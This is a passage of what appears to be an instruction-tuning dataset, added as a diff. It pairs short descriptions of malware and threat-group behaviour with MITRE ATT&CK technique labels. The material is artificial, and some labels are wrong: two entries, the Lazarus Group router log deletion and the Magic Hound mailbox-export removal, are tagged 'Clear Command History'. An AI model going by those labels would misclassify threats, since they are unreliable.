list of technique IDs with their names.", + "input": "MacMa can clear possible malware traces such as application logs.", + "output": "- T1070.002: Indicator Removal - Clear Linux or Mac System Logs" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Lazarus Group has routinely deleted log files on a compromised router, including automatic log deletion through the use of the logrotate utility.", + "output": "- T1070.003: Indicator Removal - Clear Command History" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Magic Hound has removed mailbox export requests from compromised Exchange servers.", + "output": "- T1070.003: Indicator Removal - Clear Command History" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "APT29 routinely removed their tools, including custom backdoors, once remote access was achieved. APT29 has also used SDelete to remove artifacts from victims.", + "output": "- T1070.004: Indicator Removal - File Deletion" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "FIN5 uses SDelete to clean up the environment and attempt to prevent detection.", + "output": "- T1070.004: Indicator Removal - File Deletion" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "RainyDay has the ability to uninstall itself by deleting its service and files.", + "output": "- T1070.004: Indicator Removal - File Deletion" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Recent versions of Cherry Picker delete files and registry keys created by the malware.", + "output": "- T1070.004: Indicator Removal - File Deletion" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "\"APT29 removed evidence of email export requests using \"\"Remove-MailboxExportRequest\"\".\"", + "output": "- T1070.008: Indicator Removal - Clear Mailbox Data" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "MCMD has the ability to remove set Registry Keys, including those used for persistence.", + "output": "- T1070.009: Indicator Removal - Clear Persistence" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "RTM has the ability to remove Registry entries that it created for persistence.", + "output": "- T1070.009: Indicator Removal - Clear Persistence" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "SUNBURST removed IFEO registry values to clean up traces of persistence.", + "output": "- T1070.009: Indicator Removal - Clear Persistence" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "njRAT is capable of manipulating and deleting registry keys, including those used for persistence.", + "output": "- T1070.009: Indicator Removal - Clear Persistence" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "APT34 malware often uses HTTP and DNS for C2. The group has also used the Plink utility and other tools to create tunnels to C2 servers.", + "output": "- T1071: Application Layer Protocol" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Adversaries can also use NETEAGLE to establish an RDP connection with a controller over TCP/7519.", + "output": "- T1071: Application Layer Protocol" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Duqu uses a custom command and control protocol that communicates over commonly used ports, and is frequently encapsulated by application layer protocols.", + "output": "- T1071: Application Layer Protocol\n- T1572: Protocol Tunneling" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Exaramel uses HTTPS for C2 communications.", + "output": "- T1071: Application Layer Protocol" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Siloscape connects to an IRC server for C2.", + "output": "- T1071: Application Layer Protocol" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The Regin malware platform supports many standard protocols, including SMB.", + "output": "- T1071: Application Layer Protocol" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "BBSRAT uses GET and POST requests over HTTP or HTTPS for command and control to obtain commands and send ZLIB compressed data back to the C2 server.", + "output": "- T1071.001: Application Layer Protocol - Web Protocols" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Cobalt Strike can use a custom command and control protocol that can be encapsulated in HTTP or HTTPS. All protocols use their standard assigned ports.", + "output": "- T1071.001: Application Layer Protocol - Web Protocols" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Dark Caracal's version of Bandook communicates with their server over a TCP port using HTTP payloads Base64 encoded and suffixed with the string \u201c&&&\u201d.", + "output": "- T1071.001: Application Layer Protocol - Web Protocols" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "FIN4 has used HTTP POST requests to transmit data.", + "output": "- T1071.001: Application Layer Protocol - Web Protocols" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Pony has sent collected information to the C2 via HTTP POST request.", + "output": "- T1071.001: Application Layer Protocol - Web Protocols" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "PowerShower has sent HTTP GET and POST requests to C2 servers to send information and receive instructions.", + "output": "- T1071.001: Application Layer Protocol - Web Protocols" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "\"The \"\"Uploader\"\" variant of HAMMERTOSS visits a hard-coded server over HTTP/S to download the images HAMMERTOSS uses to receive commands.\"", + "output": "- T1071.001: Application Layer Protocol - Web Protocols" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "httpclient uses HTTP for command and control.", + "output": "- T1071.001: Application Layer Protocol - Web Protocols" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Kimsuky has used FTP to download additional malware to the target machine.", + "output": "- T1071.002: Application Layer Protocol - File Transfer Protocols" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "NOKKI has used FTP for C2 communications.", + "output": "- T1071.002: Application Layer Protocol - File Transfer Protocols" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "XAgentOSX contains the ftpUpload function to use the FTPManager:uploadFile method to upload files from the target system.", + "output": "- T1071.002: Application Layer Protocol - File Transfer Protocols" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "A SUGARDUMP variant used SMTP for C2.", + "output": "- T1071.003: Application Layer Protocol - Mail Protocols" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "APT28 has used IMAP, POP3, and SMTP for a communication channel in various implants, including using self-registered Google Mail accounts and later compromised email servers of its victims.", + "output": "- T1071.003: Application Layer Protocol - Mail Protocols" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "RDAT can use email attachments for C2 communications.", + "output": "- T1071.003: Application Layer Protocol - Mail Protocols" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Zebrocy uses SMTP and POP3 for C2.", + "output": "- T1071.003: Application Layer Protocol - Mail Protocols" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Chimera has used Cobalt Strike to encapsulate C2 in DNS traffic.", + "output": "- T1071.004: Application Layer Protocol - DNS" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "LazyScripter has leveraged dynamic DNS providers for C2 communications.", + "output": "- T1071.004: Application Layer Protocol - DNS" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "SOUNDBITE communicates via DNS for C2.", + "output": "- T1071.004: Application Layer Protocol - DNS" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "SombRAT can communicate over DNS with the C2 server.", + "output": "- T1071.004: Application Layer Protocol - DNS" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "APT32 compromised McAfee ePO to move laterally by distributing malware as a software deployment task.", + "output": "- T1072: Software Deployment Tools" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Threat Group-1314 actors used a victim's endpoint management platform, Altiris, for lateral movement.", + "output": "- T1072: Software Deployment Tools" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "\"Kobalos can write captured SSH connection credentials to a file under the \"\"/var/run\"\" directory with a \"\".pid\"\" extension for exfiltration.\"", + "output": "- T1074: Data Staged" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Shark has stored information in folders named `U1` and `U2` prior to exfiltration.", + "output": "- T1074: Data Staged" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "ADVSTORESHELL stores output from command execution in a .dat file in the %TEMP% directory.", + "output": "- T1074.001: Data Staged - Local Data Staging" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Calisto uses a hidden directory named .calisto to store data from the victim\u2019s machine before exfiltration.", + "output": "- T1564.001: Hide Artifacts - Hidden Files and Directories\n- T1074.001: Data Staged - Local Data Staging" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Exaramel for Windows specifies a path to store files scheduled for exfiltration.", + "output": "- T1074.001: Data Staged - Local Data Staging" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "FunnyDream can stage collected information including screen captures and logged keystrokes locally.", + "output": "- T1074.001: Data Staged - Local Data Staging" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "GALLIUM compressed and staged files in multi-part archives in the Recycle Bin prior to exfiltration.", + "output": "- T1074.001: Data Staged - Local Data Staging" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Gold Dragon stores information gathered from the endpoint in a file named 1.hwp.", + "output": "- T1074.001: Data Staged - Local Data Staging" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Indrik Spider has stored collected date in a .tmp file.", + "output": "- T1074.001: Data Staged - Local Data Staging" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Lazarus Group malware IndiaIndia saves information gathered about the victim to a file that is saved in the %TEMP% directory, then compressed, encrypted, and uploaded to a C2 server.", + "output": "- T1074.001: Data Staged - Local Data Staging" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Machete created their own directories to drop files into.", + "output": "- T1074.001: Data Staged - Local Data Staging" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Machete stores files and logs in a folder on the local drive.", + "output": "- T1074.001: Data Staged - Local Data Staging" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "ObliqueRAT can copy specific files, webcam captures, and screenshots to local directories.", + "output": "- T1074.001: Data Staged - Local Data Staging" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "PUNCHTRACK aggregates collected data in a tmp file.", + "output": "- 